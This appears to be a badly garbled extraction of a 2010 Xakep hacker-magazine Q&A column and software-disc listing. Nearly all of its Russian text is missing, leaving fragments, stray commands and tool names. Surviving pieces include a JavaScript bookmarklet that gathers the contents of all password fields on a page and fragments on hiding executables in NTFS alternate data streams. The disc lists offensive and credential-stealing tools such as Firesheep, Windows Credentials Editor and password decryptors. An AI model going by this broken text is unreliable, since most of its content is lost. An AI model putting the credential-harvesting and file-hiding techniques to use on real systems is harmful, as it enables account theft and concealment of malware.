Hint: ,
,
.

(, Soundcare SuperSpike 1) (
Furutech G-314Ag).

Q: ,
, .
?
A: , .

Q: .
?
A: ! , :

, :
,

( ) (,
).
/ ,


. ,

(
).
?
.

.
.

Q: ?
A:

, ,


, ,
,
, ,
. ,
, () .
,
.
,

Q: , ,

?


A: . . DJ
,
,
.


.
. 30 1938
.


,
,
.
,

,

.
,
(
).

Q: ,
,

. ?
A:
.
,
,
.
,
, ,
. , ,


. ,

;
.

Q: -
.

?
A: , . ,
, ,
,

!, , ,
- . ,
,
, ,
, , ,
( ,
, ).
: , ,
, .
(. ,

PR-

][ 4 2010 ), , , -
. ,
-- ,
. , , , PR, .

Q: , .
?
A: , , .
,
? ,
.
,
?
(
, ),
, 80%
.
, ? . . ,

:
, 100% .

. ,
,
,
, , ,
,
. ,
,
,
, .
, , ,

, ,
,
, . ,
(
, , )
,
. , , ! , ,
][
:).z


UNITS

faq
united?

faq@real.xakep.ru

Q:
, . -
,
?
A: ,
. , ,

. , ,
hex- Hiew.
,
Hiew . , *,
Alt+F3 (CryBlk).
.
, Hiew ,
Crypt commands
.
<F7>,
.
,

.
<Alt+F3>, <F9>.
XOR


.

Hiew .
<F3>, <F8>
.

Q: :
Linux
. .
A:
. aufs2. - .
,
.
(aufs.sourceforge.net)
userspace- .
:
(/media/torrents)

(/media/new_storage). ,
,
:
# sudo mount -t aufs none /media/storage -o br:/media/torrents=rw:/media/new_storage=rw,create=mfs,sum


:
br: 1=rw: 2=rw:
, , , ;
create=mfs , ,
,
; sum ,
df pydf

.
/etc/fstab :
none /media/storage aufs br:/media/torrents=rw:/media/new_storage=rw,create=mfs,sum 0 0


,
mhddfs,
, fuse.

:
# sudo mhddfs /media/torrents,/media/new_storage /media/storage -o default_permissions,allow_other


.

,
SSL

Adminer phpMyAdmin

bash# ./gotssl.py google.com 443


-{ GotSSL? v0.1 }-

Q: DirectX. ,
.

,
.
?
?
A: ,
. ,
.
. ,
WinDbg.
, WinDbg . , . .server tcp:port=1111
( ).
. ,
, WinDbg, File
Connect to Remote Session...,
Connection String tcp:server=Server,port=Socket, Server
, Socket
( 1111). ,

.

Q: -
URL,
-.
A:

Soft Hyphen (SHY). ,
, . HTML4

&shy;,
-.

.
. &shy;,
. &shy;
URL-,
-. -
-
.

Q: phpMyAdmin.

MySQL ,
PHP-?
A: Adminer ( phpMinAdmin),
PHP
MySQL- .

PHP-,
. Adminer
,
phpMyAdmin. , ? :).
, www.adminer.org ,
PostgreSQL, SQLite, MS SQL Oracle.

Q: , - SSL?
A:
gotssl (mjc.me/?p=188).
,
socket. RFC
SSL Wireshark'
,
- SSL-.
,
SSLv2 Client Hello data
TLS- .
gotssl :

[*] Checking for SSL on google.com:443
[!] Yes! google.com:443 does GotSSL.

Q: (
). ?
A:
, .

JS-,
, *.
,
- . , , ,

:
javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page:\n\n" + s); else alert("There are no passwords in forms on this page.");})();


, .

Q:
.
:
(OpenID, Facebook, Twitter ..)
/
. ?


MustHave
SSD-
A:
,

(dvd.xakep.ru). ,
.
:
IntenseDebate (www.intensedebate.com)
DISQUS Comments (disqus.com).

WordPress' ( )
-,
:
;
(/ );
;

(OpenID, Twitter ..).
:
,

.
, .
.
MySQL-,
- .
Intense Debate .

Q:
SATA-
SSD. , ,
.

. SSD -.
A: . ,
,

. ,
.

SSD-. ,

,
Windows.
, -


SSD Tweak Utility (www.techspot.com/guides/246-ssd-performancetweak-utility).

.
(Use Large
System Cache),
8.3,
/
,
.
Intel
SSD Toolbox (www.intel.com/go/ssdtoolbox),

(
Intel) ( SSD
).

Q: Python . py2exe
py2app ,
.
pyinstaller,


Python.
A: cx_Freeze
(cx-freeze.sourceforge.net).
( pyinstaller),

Windows,
Linux-.
Windows
CentOS -, . cx_Freeze,
Python.

Windows. ,

.
?
A:
ExpanDrive (www.expandrive.com),
SFTP Drive.
Dokan
SSHFS (www.dokan-dev.net).
AnyClient,
FTP/S, SFTP WebDAV/S.


PuTTY. ,
(www.damtp.cam.ac.uk/user/jp107/xp-remote/ssh-map).

Q: exe-,

NTFS (ADS)?
A:
start
wmic process call create,
,
NFS.

Q:
NTFS. :
. ,
doc-
txt- Word.
?
A: Windows 7
.

NTFS:

Q: LiveCD-,

C:\temp>echo tst > maindoc.txt
( , ,
C:\temp>echo ads > maindoc.txt:ads.txt
),
? -

c:\temp\maindoc.txt:ads.txt Word... .
.
, :
, Linux
.
C:\temp>mklink txtfile c:\temp\maindoc.txt:ads.txt
A:
CloudUSB (www.cloudusb.net). Ubuntu ,
EncFS,
AES BlowFish. - (, ,
), CloudUSB
(
) Dropbox.
,
.

Q: :
( SSH)

symbolic link created for txtfile <<===>> c:\temp\maindoc.txt:ads.txt


,
(c:\temp\txtfile), , Word
.
, ,

exe.
start. ,
, , Windows 7.z

>Security
DigsbyPasswordDecryptor
ESF
Firesheep 0.1
InMemoryFuzzer
ISR-evilgrade 2.0.0
Metasploit 3.5 Pro

>Devel
Argtable 2.12
Ccache 3.1
Cdoc 0.9.7
DbVisualizer 7.1.3
Distcc 3.1
Doxygen 1.7.2
Eric 5.0.3
Firebird 2.5
Jam 2.5
Jansson 1.3
KDbg 2.2.2
KDevelop 4.1
Kodos 2.4.9

>>UNIX
>Desktop
CherryTree 0.15
ChmSee 1.2.0
Cinelerra 4.2
Desktop Designer
Doodle 0.7.0
EveryGUI 0.99b
Furius ISO Mount 0.11.3.0
Gnac 0.2.2
Google Earth 5.2
KoolDock 0.3
Launchy 2.5
Lotus Symphony 3
Nevernote 0.92.1
Strigi 0.6.4
Tesseract 3.00
X-Tile 1.8.2
XNeur + gXNeur 0.10.0
Xwrits 2.26

>Security
Arachni 0.2
BeEF 0.4.1-alpha
EDB Linux Debugger
0.9.16
hashkill 0.2.3
ISR-evilgrade 2.0.0
Metasploit 3.5 Pro
Ninja
pwntooth 0.2.3
REMO 0.2.0
Rozorback 0.1.2
RSYaba
Sguil 0.7.0
sqlsus 0.5rc1
USBsploit 0.4 BETA
wifite
Aidsql
CryptCat 1.2.1
Ctrace 0.9
Dorkmaster 0.1
Doscan 0.3.1
Firesheep 0.1
HexInject 1.1
Hyenae 0.35.2
Iexploder 1.7.2
Logkeys 0.1.1a
Mandos 1.2.3
Publimark 0.1.4
Social-Engineer Toolkit
Sydbox 0.7.1
Tariq
THC-Hydra 5.8
USBsploit 0.3b
Zed Attack Proxy 1.0.0

>Net
ClipGrab 3.0.7.2
Corkscrew 2.0
Dante 1.2.2
Facebook Notifier 0.3
Google Chrome 7.0.517.41
Histwi 0.6.7
Licq 1.5.0
Minitube 1.2
Mozilla Firefox 3.6.12
OpenVerse 0.8.7
Opera 10.63
PenguinTV 4.1
qutIM 0.2.0
Remuco 0.9.3.1
Smuxi 0.8
Steadyflow 0.1.5
TooBars 1.11
Transmission 2.10

>Games
0 A.D. Alpha 2

LLVM 2.8
Mono 2.8
Snaked 0.3
Vala 0.11.0
Valgrind 3.6.0

>>MAC'
SweetFM 2.0.1
Quick Learner 0.5
Wall4iphone 1.0
Flock 3.0
Shrinkr 1.0
Disk Drill 1.0.52
GoodSync 1.5.5
RetroX 1.2
MenuWeather 3.0.1
Greenfoot 2.0
Raw Photo Processor 4.1.8
Cyberduck 3.6.1
TrailRunner 3
Editra 0.5.86
Iceberg 1.2.9

>X-distr
Ubuntu 10.10

>System
ATI Catalyst 10.10
Avfs 0.9.9
Batmon 0.5
Blocksshd 1.3
Bontmia 0.14
Boxbackup 0.10
Cdf 0.2
Clean 3.4
Dolly 0.57
duff 0.4
Linux Kernel 2.6.36
Mesa 7.9
q4wine 0.120
Scrub 2.2
VirtualBox 3.2.10
Wine 1.3.6

>Server
Apache 2.2.17
Asterisk 1.8
BFilter 1.1.4
BIND 9.7.2-P2
CUPS 1.4.4
DHCP 4.1.1
Feng Office 1.7.2
Kamailio 3.1.0
MySQL 5.1.51
OpenLDAP 2.4.23
OpenSSH 5.6
OpenVPN 2.1.3
pgAdmin 1.12
Postfix 2.7
PostgreSQL 9.0.1
Samba 3.5.6
Squid 3.1.9
Wzdftpd 0.8.3

>Net
digsby
FluffyApp 0.8.6
Googsystray 1.2.4
mIRC v7.14
Multi Uni-Uploader 2.5
Opera 11 alpha
SmartSniff 1.72
streamwriter

>Multimedia
AeroWeather
EasyMon!
Evernote 4.0.1
Google SketchUp 8
Grooveshark v1.1.1
iTunes 10.0.1
Microsoft Expression Encoder 4
MP3 Skype Recorder v.1.9.0
RadioSure 2.1.969
Winamp 5.58
Yawcam 0.3.3

>Misc
7Conifier 0.4 R3 BETA
Anki 1.0.1
AppAdmin v1.1.0
CinemaDrape 1.2
DeskHedron 1.0
Desktop Tray Launcher 1.2
exf 1.0.1.6
Hot Corners 2.2.2.0
HotKeyMan 1.0.3
iQ-Notes 5.02
Lexiconer
Quick Cliq 1.0.3.8
RT Windows 7 Registry Tweaker v2.1
TimeFlow 0.04
UNetbootin
WinAudit Freeware v2.28.2

>Games
XMoto 0.5.3

>System
Action(s)
Aerofoil 1.5.1
CCleaner 3.0
DriveGleam
EasyBCD 2.0.2
ExactFile 1.0.0.15
Explorer++ 1.2
InjuredPixels 2.1
Intel Data Migration
Ketarin 1.5.0
MyDefragPowerGUI 1.0.2
P2 eXplorer
Rohos Mini Drive
SSD Tweaker 1.6.5
UsbDummyProtect 1.1

NirCmd v2.45
NSDECODER 1.0
OracleEnumerator v1.1.1
PaltalkPasswordDecryptor
PuzlBox
SDL Regex Fuzzer
setdllcharacteristics
TrillianPasswordDecryptor
Windows Credentials Editor 1.0
Windows Credentials Editor v1.0
(WCE)

0d

12(143) 2010

>>WINDOWS
>Development
cx_Freeze
DbVisualizer 7.1.3
Doxygen 1.7.2
Firebird 2.5.0
IronPython 2.6.2
IronRuby 1.1.1
kodos 2.4.9
PyCharm 1.0
Rad Software Regular Expression
Designer 1.4
Verych's Regular Expression Editor

UNITS

HTTP://WWW2
How-to


HTML5

INSTRUCTABLES
www.Instructables.com

THE
HTML5 TEST
www.html5test.com

.
How-to. RFID-?
? ?

?
?
? , - ? How-to ,
Instructables. !


, HTML5.
-
-, canvas video, storage (
), .
, Firefox, Opera,
, . . -
-, ,
. 300 ,
. Google Chrome 217.


,
-,


,
donate

THECOMMENTOR
www.thecommentor.com

FLATTR
www.flattr.com

][
: , -
, .
:
, , .
. (JPG,
GIF, PNG, TIFF, PSD, BMP, PDF), ,
, ,
. , 15 ,
:).

Like Facebook,
, .

, .
: (
) .
Flattr . flattr
- , donate ,
.
. ,
. ,
- ,
.
